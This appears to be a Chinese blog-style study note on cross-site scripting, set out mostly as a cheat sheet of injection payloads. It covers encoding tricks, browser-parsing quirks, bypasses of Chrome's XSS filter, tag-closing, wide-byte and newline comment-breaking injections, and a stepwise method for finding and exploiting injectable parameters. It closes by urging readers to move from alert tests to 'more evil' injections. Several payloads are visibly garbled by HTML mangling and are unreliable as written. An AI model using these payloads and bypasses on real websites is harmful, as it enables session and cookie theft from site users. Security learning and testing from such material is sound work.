该文章是本人两天的学习笔记,共享出来,跟大家交流。知识比较零散,但是对有一定 JS 基础的人来说,每个小知识都有助于开阔你的 Hack 视角。首先声明,本文只是 XSS 攻击的冰山一角,读者自行深入研究。
一、XSS学习提要
- http://qdemo.sinaapp.com/ppt/xss/ 三水清 简单介绍 xss
- http://drops.wooyun.org/tips/689 乌云 xss与字符编码
- http://www.wooyun.org/whitehats/心伤的瘦子 系列教程
- http://ha.ckers.org/xss.html 反射性XSS详细分析和解释
- http://html5sec.org/ 各种技巧 ★★★★★
二、XSS攻击要点
注意:这些插入和修改都是为了避开浏览器自身的过滤,或者开发者认为的过滤。
1. JS函数。
document.write innerHTML eval setTimeout/setInterval等等都是很多XSS攻击注入的入口
2. html实体编码
> "alert("Barret李靖")".replace(/./g, function(s){ |
3. 如果过滤 html 实体编码,可以改成URL编码
encodeURIComponent("<#") |
4. 利用 HTML5 新增字符
<colon; 冒号 |
5. JS进制转换
> "\74\163\143\162\151\160\164\76\141\154\145\162\164\50\61\51\74\57\163\143\162\151\160\164\76" |
6. Base64转换
> base64("<script>alert("Barret李靖")</script>"); |
7. 浏览器解析非严格性
<img src="image.jpg" title="Hello World" class="test"> |
①中可插入 NUL字符(0x00)
②和④中空格可以使用 tab(0x0B)与换页键(0x0C),
②还可以使用 / 替换
⑤中的"在IE中也可替换成`。
位置 | 代码 | 可能插入或替代的代码 |
</[here]></的右边>
8. 斜杠
在字符串中斜杠(/)可以用于转义字符,比如转义 " 和 ' ,双斜杠(//)可以用来注释。这样可以很轻松的改变之前的语句,注入内容。
9. 空格的处理方式
在解析的时候空格被转移成 /**/
来替换。
10. 特殊属性
1)srcdoc属性(chrome有效)
<iframe srcdoc="<lt;script<gt;alert(" barret李靖")<lt;="" script<gt;"=""></iframe>
2)autofoucus
<input onfocus="write(1)" autofocus>
3)object
<object classid="clsid:333c7bc4-460f-11d0-bc04-0080c7055a83">
<param name="dataurl" value="javascript:alert(" barret李靖")"="">
</object>
11.绕过浏览器过滤(crhome)
?t="><img src="1" onerror="alert("Barret李靖")">
<input type="hidden" id="sClientUin" value="">
浏览器会过滤onerror中的代码,所以换种方式注入
?t="><script src="data:text/html,<script>alert(" barret李靖")<="" script=""><!--
chrome拦截,是有一定的拦截规则的,只有它觉得是恶意代码的才会去拦截。
12.替换URL
<xss>
<style>.xss{background-image:url("javascript:alert('xss')");}</style><a class="xss"></a>
<style type="text/css">body{background:url("javascript:alert('xss')")}</style>
13.抓包、换包
三、XSS攻击方式
1. javascript:和vbscript:协议执行后的结果将会映射在DOM后面。
<a href="javascript:'\x3cimg src\x3dx onerror=alert(" barret李靖")="">'">click me</a>
2. 变量覆盖
<form id="location" href="bar">
<script>alert(location.href)</script>
3. meta标签
<meta http-equiv="refresh" content="0; url=javascript:alert(document.domain)">
Javascript: 协议可能被禁止,可以使用 data:
<meta http-equiv="refresh" content="0; url=data:text/html,<script>alert(" barret李靖")<="" script="">">
4. css注入
<style>
@import "data:,*%7bx:expression(write(1))%7D";
</style>
<style>
@imp\ ort"data:,*%7b- = \a %65x\pr\65 ssion(write(2))%7d"; </style>
<style>
<link rel="Stylesheet" href="data:,*%7bx:expression(write(3))%7d">
5. 提前闭合标签
http://example.com/test.php?callback=cb
缺陷代码:
<script type="text/javascript">
document.domain='soso.com';
_ret={"_res":2};
try{
parent.aaa(_ret);
}catch(err){
aaa(_ret);
}
</script>
注入:http://example.com/test.php?callback=cb<script>alert("XSS")</script>
原理:cb为回调函数,如果后端并没有对callback字段进行过滤,则可以cb</script><script>alert("XSS")</script>
这么长的一串作为函数名,然后你就懂啦~ 本方式只针对上面有缺陷的代码。
6. 提前闭合双引号
<input type="text" value="XSS<quot; onclick=<quot;alert(" barret李靖")"="">
<!--<img src="--><img src="x" onerror="alert("Barret李靖")//"">
<comment><img src="</comment><img src=x onerror=alert(" barret李靖")="" "="">
<![><img src="]><img src=x onerror=alert(" barret李靖")="" "="">
<style><img src="</style><img src="x" onerror="alert("Barret李靖")//"">
7. 阻止编码
?t=;alert("Barret李靖")
<script type="text/javascript">
var t = query(t); // t = "<quot;;alert("Barret李靖")"
</script>
上面可以看到 ";" 被编码了,观察页面编码:
<meta http-equiv="Content-Type" content="text/html; charset=gb18030">
gbxxx系列编码,可以尝试宽字节:
?t=022alert("Barret李靖") c
8. 攻击单行注释
URL对应的param中添加换行符(%0a)或者其他换行符。
?t=%0aalert("Barret李靖")//
// init('id', "%0aalert("Barret李靖")//");
被解析成
// init('id', "
alert("Barret李靖")//");
9. url
url中可以使用很多协议 http:// // javascript: vbscript: data:等等,利用这些属性,可以找到很多的空隙。
<a href="data:text/html,<script>alert(" barret李靖")<="" script="">">XSS</a>
10. Flash跨域注入
这个我不太熟悉,现在网页上Flash用的越来越少了,懒得继续看了。
11. 利用事件
<iframe src="#" onmouseover="alert(document.cookie)"></iframe>
12. 利用标签
<table><td background="javascript:alert('xss')">
四、XSS攻击实质
XSS攻击没太多神奇的地方,就是利用浏览器防御不周到或者开发者代码不健壮,悄悄对页面或者服务器进行攻击。
1. 绕过过滤
URL中的 <
,在DOM XSS中,可以使用 \u003c (unicode编码)表示,不过他有可能被过滤了,最后解析成,也可以使用 \x3c (Javascript 16进制编码),>
对应使用 \x3e。这种情况经常在 innerHTML 以及 document.write 中用到。
所谓的过滤包括人工过滤,也包括了浏览器HTML与JavaScript本身的过滤,程序员会在浏览器本身过滤过程中进行一些干扰和修改,这几个流程都给我们提供了很多 xss 攻击的入口。
1) 数据需要过滤,但是未过滤。导致XSS。比如:昵称、个人资料。
2) 业务需求使得数据只能部分过滤,但过滤规则不完善,被绕过后导致XSS。比如:日志、邮件及其它富文本应用。
2. 利用源码中js的解析
比如第二部分提出的第11点,浏览器的拦截
?t="><script>alert("Barret李靖")</script>
这样的插入会被拦截,当你发现源码中有这么一句话的时候:
function parseURL(){
//...
t.replace("WOW", "");
//..
}
便可以修改如上参数:
?t="><scrwowipt>alert("Barret李靖")</scrwowipt>
直接绕过了chrome浏览器对危险代码的防御。
五、学会XSS攻击
1. 寻找可控参数
攻击入口在哪里?一般是有输入的地方,比如URL、表单、交互等。
- 含参数的URL中找到参数 value 值的输出点,他可能在html中输入,也可能是在javascript中
- 实验各种字符(< , > " '等),判断是否被过滤,测试方式,手动输入测试
- 确定可控范围,是否可以使用unicode编码绕过,是否可以使用HTML编码绕过,是否可以使用Javascript进制编码绕过等等
2. 开始注入
注入细节上面都是,基本的思维模式:
- 覆盖
- 阻断
- 利用特性
3. 修补注入错误
注入后保证没有语法错误,否则代码不会执行,注入了也没用。这里的意思是,你注入的一个参数可能在脚本多处出现,你可以保证一处没语法错误,但是不能保证处处都正确
4. 开搞
测试的时候alert("Barret李靖"),弹出成功再继续其他更邪恶的注入方式。
六、XSS分类
为什么留到后面说。XSS也了解了很多次了,每次都是先从概念触发,感觉没啥意思,什么反射性、DOM型、储存型等等,还不如先去实践下,凭着自己对XSS的理解,多看几个网站的源码,找找乐趣。
存储型和反射型相比,只是多了输入存储、输出取出的过程。简单点说:
反射型是:输入--输出;
存储型是:输入--进入数据库*--取出数据库--输出。
这样一来,大家应该注意到以下差别:
反射型是:绝大部分情况下,输入在哪里,输出就在哪里。
存储型是:输入在A处进入数据库, 而输出则可能出现在其它任何用到数据的地方。
反射型是:输入大部分位于地址栏或来自DOM的某些属性,也会偶尔有数据在请求中(POST类型)
存储型是:输入大部分来自POST/GET请求,常见于一些保存操作中。
因而我们找存储型的时候,从一个地方输入数据,需要检测很多输出的点,从而可能会在很多点发现存储型XSS。
七、辅助工具
- http://ha.ckers.org/xsscalc.html
- chrome插件 (xss Encode,百度之)
- 抓包工具,fiddler4 chales
- 白名单过滤工具github/js-xss
八、小结
简单小结:
- < 号不应该出现在HTML的大部分节点中。
- 括号<>是不应该出现在标签内的,除非为引号引用。
- 在ext节点里面,<左尖括号有很大的危害。
- 引号在标签内可能有危害,具体危害取决于存在的位置,但是在text节点是没有危害的。
- 。。。
关注漏洞报告平台 Wooyun,多动脑筋,手动 hack。最重要的还是先黑客再红客。
九、参考资料